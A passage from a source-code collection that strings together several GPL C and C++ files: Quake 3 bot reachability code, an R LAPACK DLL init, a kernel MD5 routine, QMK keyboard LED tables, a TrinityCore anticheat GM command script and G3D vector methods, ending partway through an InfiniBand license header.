		botimport.Print(PRT_MESSAGE, "%6d reach jumppad\n", reach_jumppad);
#endif
		//*/
		//store all the reachabilities
		AAS_StoreReachability();
		//free the reachability link heap
		AAS_ShutDownReachabilityHeap();
		//
		FreeMemory(areareachability);
		//
		aasworld.numreachabilityareas++;
		//
		botimport.Print(PRT_MESSAGE, "calculating clusters...\n");
	} //end if
	else
	{
		lastpercentage = aasworld.numreachabilityareas * 1000 / aasworld.numareas;
		botimport.Print(PRT_MESSAGE, "\r%6.1f%%", (float) lastpercentage / 10);
	} //end else
	//not yet finished
	return qtrue;
} //end of the function AAS_ContinueInitReachability
//===========================================================================
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
// Starts the reachability calculation for the currently loaded AAS file.
// If the file already contains reachabilities (and recalculation is not
// forced) the calculation is skipped entirely; otherwise the state is set
// up and the actual work is done incrementally by
// AAS_ContinueInitReachability().
void AAS_InitReachability(void)
{
	if (!aasworld.loaded) return;
	//if the AAS file already contains reachabilities
	if (aasworld.reachabilitysize)
	{
#ifndef BSPC
		//only recalculate when the "forcereachability" libvar is set
		if (!((int)LibVarGetValue("forcereachability")))
		{
			//mark the calculation as already finished
			aasworld.numreachabilityareas = aasworld.numareas + 2;
			return;
		} //end if
#else
		//mark the calculation as already finished
		aasworld.numreachabilityareas = aasworld.numareas + 2;
		return;
#endif //BSPC
	} //end if
#ifndef BSPC
	calcgrapplereach = LibVarGetValue("grapplereach");
#endif
	//the recalculated reachabilities should be written back to file
	aasworld.savefile = qtrue;
	//start with area 1 because area zero is a dummy
	aasworld.numreachabilityareas = 1;
	////aasworld.numreachabilityareas = aasworld.numareas + 1;		//only calculate entity reachabilities
	//setup the heap with reachability links
	AAS_SetupReachabilityHeap();
	//allocate area reachability link array
	areareachability = (aas_lreachability_t **) GetClearedMemory(
									aasworld.numareas * sizeof(aas_lreachability_t *));
	//
	AAS_SetWeaponJumpAreaFlags();
} //end of the function AAS_InitReachable
| gpl-2.0 |
radfordneal/pqR | src/modules/lapack/init_win.c | 4 | 1084 | /*
* R : A Computer Language for Statistical Data Analysis
* Copyright (C) 2001-2010 The R Core Team
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, a copy is available at
* http://www.r-project.org/Licenses/
*/
#ifdef HAVE_CONFIG_H
#include <config.h>
#endif
#ifdef WIN32
# include <fcntl.h>
/* Runs automatically when this DLL is loaded: gfortran's startup code
   switches the standard streams to _O_BINARY, so force stdout and
   stderr back to text mode. */
static void __attribute__((constructor))
init(void)
{
    setmode(1, _O_TEXT);   /* fd 1: stdout */
    setmode(2, _O_TEXT);   /* fd 2: stderr */
}
#endif
| gpl-2.0 |
spacex/kernel-centos6 | fs/nfsd/md5.c | 4 | 3257 | /*
* MD5 Message Digest Algorithm (RFC1321) (internal knfsd implementation)
*
* Derived from cryptoapi implementation, originally based on the
* public domain implementation written by Colin Plumb in 1993.
*
* Copyright (c) Cryptoapi developers.
* Copyright (c) 2002 James Morris <jmorris@intercode.com.au>
* Copyright (c) 2013 Jeff Layton <jlayton@redhat.com>
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the Free
* Software Foundation; either version 2 of the License, or (at your option)
* any later version.
*/
#include <linux/string.h>
#include <linux/types.h>
#include <linux/cryptohash.h>
#include <asm/byteorder.h>
#include <linux/slab.h>
#define MD5_DIGEST_SIZE 16
#define MD5_HMAC_BLOCK_SIZE 64
#define MD5_BLOCK_WORDS 16
#define MD5_HASH_WORDS 4
/* Working state for an in-progress MD5 computation. */
struct md5_ctx {
	u32 hash[MD5_HASH_WORDS];	/* running digest state (A, B, C, D) */
	u32 block[MD5_BLOCK_WORDS];	/* 64-byte input block being accumulated */
	u64 byte_count;			/* total number of bytes hashed so far */
};
/* XXX: this stuff can be optimized */
/* Convert an array of little-endian 32-bit words to CPU byte order in place. */
static inline void le32_to_cpu_array(u32 *buf, unsigned int words)
{
	unsigned int i;

	for (i = 0; i < words; i++)
		__le32_to_cpus(&buf[i]);
}
/* Convert an array of CPU byte order 32-bit words to little-endian in place. */
static inline void cpu_to_le32_array(u32 *buf, unsigned int words)
{
	unsigned int i;

	for (i = 0; i < words; i++)
		__cpu_to_le32s(&buf[i]);
}
/* Byte-swap the queued block to CPU order and mix it into the hash state. */
static inline void md5_transform_helper(struct md5_ctx *ctx)
{
	le32_to_cpu_array(ctx->block, sizeof(ctx->block) / sizeof(u32));
	md5_transform(ctx->hash, ctx->block);
}
static void md5_init(struct md5_ctx *mctx)
{
mctx->hash[0] = 0x67452301;
mctx->hash[1] = 0xefcdab89;
mctx->hash[2] = 0x98badcfe;
mctx->hash[3] = 0x10325476;
mctx->byte_count = 0;
}
/*
 * Feed @len bytes of @data into the digest.  Input is buffered in
 * mctx->block; each time a full 64-byte block is available it is run
 * through md5_transform_helper().
 */
static void md5_update(struct md5_ctx *mctx, const u8 *data, unsigned int len)
{
	/* free bytes remaining in the partial block buffer */
	const u32 avail = sizeof(mctx->block) - (mctx->byte_count & 0x3f);
	mctx->byte_count += len;
	/* not enough new data to complete a block: just queue it */
	if (avail > len) {
		memcpy((char *)mctx->block + (sizeof(mctx->block) - avail),
		       data, len);
		return;
	}
	/* top up and process the pending partial block */
	memcpy((char *)mctx->block + (sizeof(mctx->block) - avail),
	       data, avail);
	md5_transform_helper(mctx);
	data += avail;
	len -= avail;
	/* process any further whole blocks */
	while (len >= sizeof(mctx->block)) {
		memcpy(mctx->block, data, sizeof(mctx->block));
		md5_transform_helper(mctx);
		data += sizeof(mctx->block);
		len -= sizeof(mctx->block);
	}
	/* queue the trailing partial block, if any */
	memcpy(mctx->block, data, len);
}
/*
 * Finish the digest: append the 0x80 pad byte, zero-fill up to byte 56,
 * append the 64-bit bit count, run the last transform(s) and write the
 * 16-byte little-endian digest to @out.  The context is wiped afterwards.
 */
static void md5_final(struct md5_ctx *mctx, u8 *out)
{
    const unsigned int offset = mctx->byte_count & 0x3f;
    char *p = (char *)mctx->block + offset;
    int padding = 56 - (offset + 1);

    *p++ = 0x80;
    if (padding < 0) {
        /* No room for the length in this block: pad it out, compress,
         * and start a fresh block for the length words. */
        memset(p, 0x00, padding + sizeof(u64));
        md5_transform_helper(mctx);
        p = (char *)mctx->block;
        padding = 56;
    }

    memset(p, 0, padding);
    /* Bit count, low word then high word (byte_count << 3, truncated). */
    mctx->block[14] = mctx->byte_count << 3;
    mctx->block[15] = mctx->byte_count >> 29;
    /* Swap only the 14 data words; the two length words above are already
     * in CPU order, so exclude sizeof(u64) from the conversion. */
    le32_to_cpu_array(mctx->block, (sizeof(mctx->block) -
                      sizeof(u64)) / sizeof(u32));
    md5_transform(mctx->hash, mctx->block);
    cpu_to_le32_array(mctx->hash, sizeof(mctx->hash) / sizeof(u32));
    memcpy(out, mctx->hash, sizeof(mctx->hash));

    /* Clear potentially sensitive state. */
    memset(mctx, 0, sizeof(*mctx));
}
/*
 * nfsd_md5_digest - compute the MD5 digest of a buffer
 * @out:  receives the 16-byte (MD5_DIGEST_SIZE) digest
 * @data: input bytes to hash
 * @len:  number of input bytes
 *
 * Always returns 0.  The MD5 context is small (less than 100 bytes) and of
 * fixed size, so keep it on the stack instead of round-tripping through
 * kmalloc(); this removes the only failure path (-ENOMEM) the previous
 * implementation had, which remains backward compatible with callers that
 * check for a non-zero return.
 */
int
nfsd_md5_digest(u8 *out, u8 *data, unsigned int len)
{
    struct md5_ctx mctx;

    md5_init(&mctx);
    md5_update(&mctx, data, len);
    md5_final(&mctx, out);  /* md5_final() also wipes the context */
    return 0;
}
| gpl-2.0 |
zabereer/qmk_firmware | keyboards/k_type/k_type.c | 4 | 8531 | /*
Copyright 2012,2013 Jun Wako <wakojun@gmail.com>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#include "k_type.h"
#ifdef RGB_MATRIX_ENABLE
#include "is31fl3733-dual.h"
/*
 * Physical LED to IS31FL3733 register mapping: one entry per LED, giving
 * { driver index, channel, channel, channel }.
 * NOTE(review): the column-to-colour (R/G/B) assignment is determined by
 * the is31_led definition in is31fl3733-dual.h — confirm there.
 */
const is31_led __flash g_is31_leds[DRIVER_LED_TOTAL] = {
    /* Driver 1 (index 0) on the primary I2C bus. */
    { 0, B_1, A_1, C_1 },
    { 0, B_2, A_2, C_2 },
    { 0, B_3, A_3, C_3 },
    { 0, B_4, A_4, C_4 },
    { 0, B_5, A_5, C_5 },
    { 0, B_6, A_6, C_6 },
    { 0, B_7, A_7, C_7 },
    { 0, B_8, A_8, C_8 },
    { 0, B_9, A_9, C_9 },
    { 0, B_10, A_10, C_10 },
    { 0, B_11, A_11, C_11 },
    { 0, B_12, A_12, C_12 },
    { 0, B_13, A_13, C_13 },
    { 0, B_14, A_14, C_14 },
    { 0, B_15, A_15, C_15 },
    { 0, B_16, A_16, C_16 },
    { 0, E_1, D_1, F_1 },
    { 0, E_2, D_2, F_2 },
    { 0, E_3, D_3, F_3 },
    { 0, E_4, D_4, F_4 },
    { 0, E_5, D_5, F_5 },
    { 0, E_6, D_6, F_6 },
    { 0, E_7, D_7, F_7 },
    { 0, E_8, D_8, F_8 },
    { 0, E_9, D_9, F_9 },
    { 0, E_10, D_10, F_10 },
    { 0, E_11, D_11, F_11 },
    { 0, E_12, D_12, F_12 },
    { 0, E_13, D_13, F_13 },
    { 0, E_14, D_14, F_14 },
    { 0, E_15, D_15, F_15 },
    { 0, E_16, D_16, F_16 },
    { 0, H_1, G_1, I_1 },
    { 0, H_2, G_2, I_2 },
    { 0, H_3, G_3, I_3 },
    { 0, H_4, G_4, I_4 },
    { 0, H_5, G_5, I_5 },
    { 0, H_6, G_6, I_6 },
    { 0, H_7, G_7, I_7 },
    { 0, H_8, G_8, I_8 },
    { 0, H_9, G_9, I_9 },
    { 0, H_10, G_10, I_10 },
    { 0, H_11, G_11, I_11 },
    { 0, H_12, G_12, I_12 },
    { 0, H_13, G_13, I_13 },
    { 0, H_14, G_14, I_14 },
    { 0, H_15, G_15, I_15 },
    { 0, H_16, G_16, I_16 },
    { 0, K_1, J_1, L_1 },
    { 0, K_2, J_2, L_2 },
    { 0, K_3, J_3, L_3 },
    { 0, K_4, J_4, L_4 },
    { 0, K_5, J_5, L_5 },
    { 0, K_6, J_6, L_6 },
    { 0, K_7, J_7, L_7 },
    { 0, K_8, J_8, L_8 },
    { 0, K_9, J_9, L_9 },
    { 0, K_10, J_10, L_10 },
    { 0, K_11, J_11, L_11 },
    { 0, K_12, J_12, L_12 },
    { 0, K_13, J_13, L_13 },
    { 0, K_14, J_14, L_14 },
    { 0, K_15, J_15, L_15 },
    { 0, K_16, J_16, L_16 },
    // Driver 2 is on I2C2 - currently not usable with i2c_master
    { 1, B_1, A_1, C_1 },
    { 1, B_2, A_2, C_2 },
    { 1, B_3, A_3, C_3 },
    { 1, B_4, A_4, C_4 },
    { 1, B_5, A_5, C_5 },
    { 1, B_6, A_6, C_6 },
    { 1, B_7, A_7, C_7 },
    { 1, B_8, A_8, C_8 },
    { 1, B_9, A_9, C_9 },
    { 1, B_10, A_10, C_10 },
    { 1, B_11, A_11, C_11 },
    { 1, B_12, A_12, C_12 },
    { 1, B_13, A_13, C_13 },
    { 1, B_14, A_14, C_14 },
    { 1, B_15, A_15, C_15 },
    { 1, B_16, A_16, C_16 },
    { 1, E_1, D_1, F_1 },
    { 1, E_2, D_2, F_2 },
    { 1, E_3, D_3, F_3 },
    { 1, E_4, D_4, F_4 },
    { 1, E_5, D_5, F_5 },
    { 1, E_6, D_6, F_6 },
    { 1, E_7, D_7, F_7 },
    { 1, E_8, D_8, F_8 },
    { 1, E_9, D_9, F_9 },
    { 1, E_10, D_10, F_10 },
    { 1, E_11, D_11, F_11 },
    { 1, E_12, D_12, F_12 },
    { 1, E_13, D_13, F_13 },
    { 1, E_14, D_14, F_14 },
    { 1, E_15, D_15, F_15 },
    { 1, E_16, D_16, F_16 },
    { 1, H_1, G_1, I_1 },
    { 1, H_2, G_2, I_2 },
    { 1, H_3, G_3, I_3 },
    { 1, H_4, G_4, I_4 },
    { 1, H_5, G_5, I_5 },
    { 1, H_6, G_6, I_6 },
    { 1, H_7, G_7, I_7 },
    { 1, H_8, G_8, I_8 },
    { 1, H_9, G_9, I_9 },
    { 1, H_10, G_10, I_10 },
    { 1, H_11, G_11, I_11 },
    { 1, H_12, G_12, I_12 },
    { 1, H_13, G_13, I_13 },
    { 1, H_14, G_14, I_14 },
    { 1, H_15, G_15, I_15 },
    { 1, H_16, G_16, I_16 },
    { 1, K_1, J_1, L_1 },
    { 1, K_2, J_2, L_2 },
    { 1, K_3, J_3, L_3 },
    { 1, K_4, J_4, L_4 },
    { 1, K_5, J_5, L_5 },
    { 1, K_6, J_6, L_6 },
    { 1, K_7, J_7, L_7 }
};
/*
 * QMK RGB-matrix configuration: key-matrix-to-LED index map, LED physical
 * positions (x in 0..224, y in 0..64 per QMK convention), and per-LED flags.
 * NOTE(review): flag values look like QMK's LED_FLAG_* bits
 * (1 = modifier, 2 = underglow, 4 = keylight) — confirm against rgb_matrix.h.
 */
led_config_t g_led_config = {
    {
        // Key Matrix to LED Index
        { 0, 1, 2, 3, 4, 5, 6, 7, 8, 9 },
        { 10, 11, 12, 13, 14, 15, 16, 17, 18, 19 },
        { 20, 21, 22, 23, 24, 25, 26, 27, 28, NO_LED },
        { 29, NO_LED, 30, 31, 32, 33, 34, 35, 36, 37 },
        { 38, 39, 40, 41, 42, 43, 44, 45, 46, NO_LED },
        { 47, 48, 49, 50, 51, 52, 53, 54, 55, 56 },
        { 57, 58, 59, 60, 61, NO_LED, 62, NO_LED, 63, NO_LED },
        { 64, 65, 66, 67, 68, 69, 70, 71, 72, 73 },
        { NO_LED, 74, NO_LED, 75, 76, 77, 78, 79, 80, 81 },
        { 82, 83, 84, 85, 86, NO_LED, NO_LED, NO_LED, NO_LED, NO_LED }
    }, {
        // LED Index to Physical Position
        // Key LED
        { 0, 0 }, { 26.35, 0 }, { 39.53, 0 }, { 52.71, 0 }, { 65.88, 0 }, { 79.06, 0 }, { 92.24, 0 }, { 105.41, 0 }, { 118.59, 0 }, { 131.77, 0 }, { 144.94, 0 }, { 158.12, 0 }, { 171.29, 0 }, { 197.65, 0 }, { 210.82, 0 }, { 224, 0 },
        { 0, 21.33 }, { 13.18, 21.33 }, { 26.35, 21.33 }, { 39.53, 21.33 }, { 52.71, 21.33 }, { 65.88, 21.33 }, { 79.06, 21.33 }, { 92.24, 21.33 }, { 105.41, 21.33 }, { 118.59, 21.33 }, { 131.77, 21.33 }, { 144.94, 21.33 }, { 158.12, 21.33 }, { 171.29, 21.33 }, { 197.65, 21.33 }, { 210.82, 21.33 }, { 224, 21.33 },
        { 0, 32 }, { 13.18, 32 }, { 26.35, 32 }, { 39.53, 32 }, { 52.71, 32 }, { 65.88, 32 }, { 79.06, 32 }, { 92.24, 32 }, { 105.41, 32 }, { 118.59, 32 }, { 131.77, 32 }, { 144.94, 32 }, { 158.12, 32 }, { 171.29, 32 }, { 197.65, 32 }, { 210.82, 32 }, { 224, 32 },
        { 0, 42.67 }, { 13.18, 42.67 }, { 26.35, 42.67 }, { 39.53, 42.67 }, { 52.71, 42.67 }, { 65.88, 42.67 }, { 79.06, 42.67 }, { 92.24, 42.67 }, { 105.41, 42.67 }, { 118.59, 42.67 }, { 131.77, 42.67 }, { 144.94, 42.67 }, { 171.29, 42.67 },
        { 0, 53.33 }, { 26.35, 53.33 }, { 39.53, 53.33 }, { 52.71, 53.33 }, { 65.88, 53.33 }, { 79.06, 53.33 }, { 92.24, 53.33 }, { 105.41, 53.33 }, { 118.59, 53.33 }, { 131.77, 53.33 }, { 144.94, 53.33 }, { 171.29, 53.33 }, { 210.82, 53.33 },
        { 0, 64 }, { 13.18, 64 }, { 26.35, 64 }, { 79.06, 64 }, { 131.77, 64 }, { 144.94, 64 }, { 158.12, 64 }, { 171.29, 64 }, { 197.65, 64 }, { 210.82, 64 }, { 224, 64 },
        // Underglow LED
        { 224, 64 }, { 206.77, 64 }, { 189.54, 64 }, { 172.31, 64 }, { 155.08, 64 }, { 137.85, 64 }, { 120.61, 64 }, { 103.38, 64 }, { 86.15, 64 }, { 68.92, 64 }, { 51.69, 64 }, { 34.46, 64 }, { 17.23, 64 }, { 0, 64 },
        { 0, 42.67 }, { 0, 21.33 },
        { 0, 0 }, { 17.23, 0 }, { 34.46, 0 }, { 51.69, 0 }, { 68.92, 0 }, { 86.15, 0 }, { 103.38, 0 }, { 120.61, 0 }, { 137.85, 0 }, { 155.08, 0 }, { 172.31, 0 }, { 189.54, 0 }, { 206.77, 0 }, { 224, 0 },
        { 224, 21.33 }, { 224, 42.67 }
    }, {
        // LED Index to Flag
        //Key LED
        1, 4, 4, 4, 4, 1, 1, 1, 1, 4, 4, 4, 4, 1, 1, 1,
        1, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 1, 4, 4, 4,
        1, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4,
        1, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 1,
        1, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 1, 1,
        1, 1, 1, 4, 1, 1, 1, 1, 1, 1, 1,
        // Underglow LED
        2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
        2, 2,
        2, 2,
        2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
    }
};
#endif
| gpl-2.0 |
josemikkola/Core | Core/src/server/scripts/Commands/cs_anticheat.cpp | 4 | 8727 | /*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation; either version 2 of the License, or (at your
* option) any later version.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#include "ScriptMgr.h"
#include "ObjectMgr.h"
#include "Chat.h"
#include "AnticheatMgr.h"
#include "Language.h"
/*
 * Chat command script exposing the ".anticheat" GM command group:
 * global / player / delete / handle / jail / warn.
 * Most subcommands require CONFIG_ANTICHEAT_ENABLE to be set.
 */
class anticheat_commandscript : public CommandScript
{
public:
    anticheat_commandscript() : CommandScript("anticheat_commandscript") { }

    /* Build the static dispatch table for ".anticheat <sub> [args]". */
    ChatCommand* GetCommands() const
    {
        static ChatCommand anticheatCommandTable[] =
        {
            { "global", SEC_GAMEMASTER, true, &HandleAntiCheatGlobalCommand, "", NULL },
            { "player", SEC_GAMEMASTER, true, &HandleAntiCheatPlayerCommand, "", NULL },
            { "delete", SEC_ADMINISTRATOR, true, &HandleAntiCheatDeleteCommand, "", NULL },
            { "handle", SEC_ADMINISTRATOR, true, &HandleAntiCheatHandleCommand, "", NULL },
            { "jail", SEC_GAMEMASTER, true, &HandleAnticheatJailCommand, "", NULL },
            { "warn", SEC_GAMEMASTER, true, &HandleAnticheatWarnCommand, "", NULL },
            { NULL, 0, false, NULL, "", NULL }
        };
        static ChatCommand commandTable[] =
        {
            { "anticheat", SEC_GAMEMASTER, true, NULL, "", anticheatCommandTable},
            { NULL, 0, false, NULL, "", NULL }
        };
        return commandTable;
    }

    /*
     * ".anticheat warn [name]" - send a canned warning message to the named
     * player, or to the GM's current selection when no name is given.
     * NOTE(review): strtok((char*)args, ...) casts away const and mutates the
     * caller's argument buffer; this lookup pattern is duplicated in several
     * handlers below and could be factored into a helper.
     */
    static bool HandleAnticheatWarnCommand(ChatHandler* handler, const char* args)
    {
        if (!sWorld->getBoolConfig(CONFIG_ANTICHEAT_ENABLE))
            return false;

        Player* pTarget = NULL;
        std::string strCommand;
        char* command = strtok((char*)args, " ");
        if (command)
        {
            strCommand = command;
            normalizePlayerName(strCommand);
            pTarget = sObjectAccessor->FindPlayerByName(strCommand.c_str()); //get player by name
        } else
            pTarget = handler->getSelectedPlayer();

        if (!pTarget)
            return false;

        WorldPacket data;
        // need copy to prevent corruption by strtok call in LineFromMessage original string
        char* buf = strdup("The anticheat system has reported several times that you may be cheating. You will be monitored to confirm if this is accurate.");
        char* pos = buf;
        while (char* line = handler->LineFromMessage(pos))
        {
            handler->FillSystemMessageData(&data, line);
            pTarget->GetSession()->SendPacket(&data);
        }
        free(buf);
        return true;
    }

    /*
     * ".anticheat jail [name]" - teleport the target (and the issuing GM) to
     * the jail location and rebind the target's hearthstone there.
     * NOTE(review): jail coordinates (map 1, GM island area) and homebind
     * area id 876 are hard-coded; consider moving them to config.
     */
    static bool HandleAnticheatJailCommand(ChatHandler* handler, const char* args)
    {
        if (!sWorld->getBoolConfig(CONFIG_ANTICHEAT_ENABLE))
            return false;

        Player* pTarget = NULL;
        std::string strCommand;
        char* command = strtok((char*)args, " ");
        if (command)
        {
            strCommand = command;
            normalizePlayerName(strCommand);
            pTarget = sObjectAccessor->FindPlayerByName(strCommand.c_str()); //get player by name
        } else
            pTarget = handler->getSelectedPlayer();

        if (!pTarget)
        {
            handler->SendSysMessage(LANG_PLAYER_NOT_FOUND);
            handler->SetSentErrorMessage(true);
            return false;
        }

        // Refuse to jail yourself.
        if (pTarget == handler->GetSession()->GetPlayer())
            return false;

        // teleport both to jail.
        pTarget->TeleportTo(1,16226.5f,16403.6f,-64.5f,3.2f);
        handler->GetSession()->GetPlayer()->TeleportTo(1,16226.5f,16403.6f,-64.5f,3.2f);

        WorldLocation loc;
        // the player should be already there, but no :(
        // pTarget->GetPosition(&loc);
        loc.m_mapId = 1;
        loc.m_positionX = 16226.5f;
        loc.m_positionY = 16403.6f;
        loc.m_positionZ = -64.5f;
        loc.m_orientation = 3.2f;
        pTarget->SetHomebind(loc,876);
        return true;
    }

    /*
     * ".anticheat delete <name|deleteall>" - clear stored cheat reports for
     * one player, or for everyone (guid 0 means "all" to the manager).
     */
    static bool HandleAntiCheatDeleteCommand(ChatHandler* handler, const char* args)
    {
        if (!sWorld->getBoolConfig(CONFIG_ANTICHEAT_ENABLE))
            return false;

        std::string strCommand;
        char* command = strtok((char*)args, " "); //get entered name
        if (!command)
            return true;

        strCommand = command;
        if (strCommand.compare("deleteall") == 0)
            sAnticheatMgr->AnticheatDeleteCommand(0);
        else
        {
            normalizePlayerName(strCommand);
            Player* player = sObjectAccessor->FindPlayerByName(strCommand.c_str()); //get player by name
            if (!player)
                handler->PSendSysMessage("Player doesn't exist");
            else
                sAnticheatMgr->AnticheatDeleteCommand(player->GetGUIDLow());
        }
        return true;
    }

    /*
     * ".anticheat player [name]" - print the report statistics (average plus
     * per-type counters) for the named player or the current selection.
     */
    static bool HandleAntiCheatPlayerCommand(ChatHandler* handler, const char* args)
    {
        if (!sWorld->getBoolConfig(CONFIG_ANTICHEAT_ENABLE))
            return false;

        std::string strCommand;
        char* command = strtok((char*)args, " ");
        uint32 guid = 0;
        Player* player = NULL;
        if (command)
        {
            strCommand = command;
            normalizePlayerName(strCommand);
            player = sObjectAccessor->FindPlayerByName(strCommand.c_str()); //get player by name
            if (player)
                guid = player->GetGUIDLow();
        } else
        {
            player = handler->getSelectedPlayer();
            if (player)
                guid = player->GetGUIDLow();
        }

        if (!guid)
        {
            handler->PSendSysMessage("There is no player.");
            return true;
        }

        /* Type indices follow the manager's report-type enum:
         * 0 speed, 1 fly, 2 waterwalk, 3 jump, 4 teleport-to-plane, 5 climb. */
        float average = sAnticheatMgr->GetAverage(guid);
        uint32 total_reports = sAnticheatMgr->GetTotalReports(guid);
        uint32 speed_reports = sAnticheatMgr->GetTypeReports(guid,0);
        uint32 fly_reports = sAnticheatMgr->GetTypeReports(guid,1);
        uint32 jump_reports = sAnticheatMgr->GetTypeReports(guid,3);
        uint32 waterwalk_reports = sAnticheatMgr->GetTypeReports(guid,2);
        uint32 teleportplane_reports = sAnticheatMgr->GetTypeReports(guid,4);
        uint32 climb_reports = sAnticheatMgr->GetTypeReports(guid,5);

        handler->PSendSysMessage("Information about player %s",player->GetName().c_str());
        handler->PSendSysMessage("Average: %f || Total Reports: %u ",average,total_reports);
        handler->PSendSysMessage("Speed Reports: %u || Fly Reports: %u || Jump Reports: %u ",speed_reports,fly_reports,jump_reports);
        handler->PSendSysMessage("Walk On Water Reports: %u || Teleport To Plane Reports: %u",waterwalk_reports,teleportplane_reports);
        handler->PSendSysMessage("Climb Reports: %u", climb_reports);
        return true;
    }

    /* ".anticheat handle <on|off>" - toggle the anticheat system at runtime. */
    static bool HandleAntiCheatHandleCommand(ChatHandler* handler, const char* args)
    {
        std::string strCommand;
        char* command = strtok((char*)args, " ");
        if (!command)
            return true;

        if (!handler->GetSession()->GetPlayer())
            return true;

        strCommand = command;
        if (strCommand.compare("on") == 0)
        {
            sWorld->setBoolConfig(CONFIG_ANTICHEAT_ENABLE,true);
            handler->SendSysMessage("The Anticheat System is now: Enabled!");
        }
        else if (strCommand.compare("off") == 0)
        {
            sWorld->setBoolConfig(CONFIG_ANTICHEAT_ENABLE,false);
            handler->SendSysMessage("The Anticheat System is now: Disabled!");
        }
        return true;
    }

    /* ".anticheat global" - print a server-wide report summary. */
    static bool HandleAntiCheatGlobalCommand(ChatHandler* handler, const char* args)
    {
        if (!sWorld->getBoolConfig(CONFIG_ANTICHEAT_ENABLE))
        {
            handler->PSendSysMessage("The Anticheat System is disabled.");
            return true;
        }

        sAnticheatMgr->AnticheatGlobalCommand(handler);
        return true;
    }
};
/* Registration hook called by the script loader; the ScriptMgr owns the object. */
void AddSC_anticheat_commandscript()
{
    new anticheat_commandscript();
}
| gpl-2.0 |
HonosDev/TrinityCore | dep/g3dlite/source/Vector2int16.cpp | 260 | 1576 | /**
\file G3D/Vector2int16.cpp
\author Morgan McGuire, http://graphics.cs.williams.edu
\created 2003-08-09
\edited 2011-01-06
*/
#include "G3D/platform.h"
#include "G3D/g3dmath.h"
#include "G3D/Vector2int16.h"
#include "G3D/Vector2.h"
#include "G3D/BinaryInput.h"
#include "G3D/BinaryOutput.h"
#include "G3D/Any.h"
#include "G3D/Vector2int32.h"
namespace G3D {

/* Narrowing conversion from Vector2int32.
 * NOTE(review): the int32 components are silently truncated to int16. */
Vector2int16::Vector2int16(const class Vector2int32& v) : x(v.x), y(v.y) {}

/* Deserialize from an Any that is either the array form
 * Vector2int16(x, y) or the table form {x = ..., y = ...}. */
Vector2int16::Vector2int16(const Any& any) {
    any.verifyName("Vector2int16", "Point2int16");
    any.verifyType(Any::TABLE, Any::ARRAY);
    any.verifySize(2);

    if (any.type() == Any::ARRAY) {
        x = any[0];
        y = any[1];
    } else {
        // Table
        x = any["x"];
        y = any["y"];
    }
}

/* Assignment from Any: delegate to the Any constructor. */
Vector2int16& Vector2int16::operator=(const Any& a) {
    *this = Vector2int16(a);
    return *this;
}

/* Serialize to the array form Vector2int16(x, y). */
Any Vector2int16::toAny() const {
    Any any(Any::ARRAY, "Vector2int16");
    any.append(x, y);
    return any;
}

/* Conversion from float vector, rounding each component to nearest
 * (iFloor(v + 0.5), i.e. half-up). */
Vector2int16::Vector2int16(const class Vector2& v) {
    x = (int16)iFloor(v.x + 0.5);
    y = (int16)iFloor(v.y + 0.5);
}

/* Read from a binary stream (two int16 values, x then y). */
Vector2int16::Vector2int16(class BinaryInput& bi) {
    deserialize(bi);
}

void Vector2int16::serialize(class BinaryOutput& bo) const {
    bo.writeInt16(x);
    bo.writeInt16(y);
}

void Vector2int16::deserialize(class BinaryInput& bi) {
    x = bi.readInt16();
    y = bi.readInt16();
}

/* Component-wise clamp of *this into [lo, hi]. */
Vector2int16 Vector2int16::clamp(const Vector2int16& lo, const Vector2int16& hi) {
    return Vector2int16(iClamp(x, lo.x, hi.x), iClamp(y, lo.y, hi.y));
}

}
| gpl-2.0 |
htc-mirror/endeavoru-2.6.39-86aa44d | drivers/infiniband/ulp/ipoib/ipoib_ib.c | 260 | 27798 | /*
* Copyright (c) 2004, 2005 Topspin Communications. All rights reserved.
* Copyright (c) 2005 Sun Microsystems, Inc. All rights reserved.
* Copyright (c) 2005 Mellanox Technologies. All rights reserved.
* Copyright (c) 2004, 2005 Voltaire, Inc. All rights reserved.
*
* This software is available to you under a choice of one of two
* licenses. You may choose to be licensed under the terms of the GNU
* General Public License (GPL) Version 2, available from the file
* COPYING in the main directory of this source tree, or the
* OpenIB.org BSD license below:
*
* Redistribution and use in source and binary forms, with or
* without modification, are permitted provided that the following
* conditions are met:
*
* - Redistributions of source code must retain the above
* copyright notice, this list of conditions and the following
* disclaimer.
*
* - Redistributions in binary form must reproduce the above
* copyright notice, this list of conditions and the following
* disclaimer in the documentation and/or other materials
* provided with the distribution.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
* EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
* MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
* NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
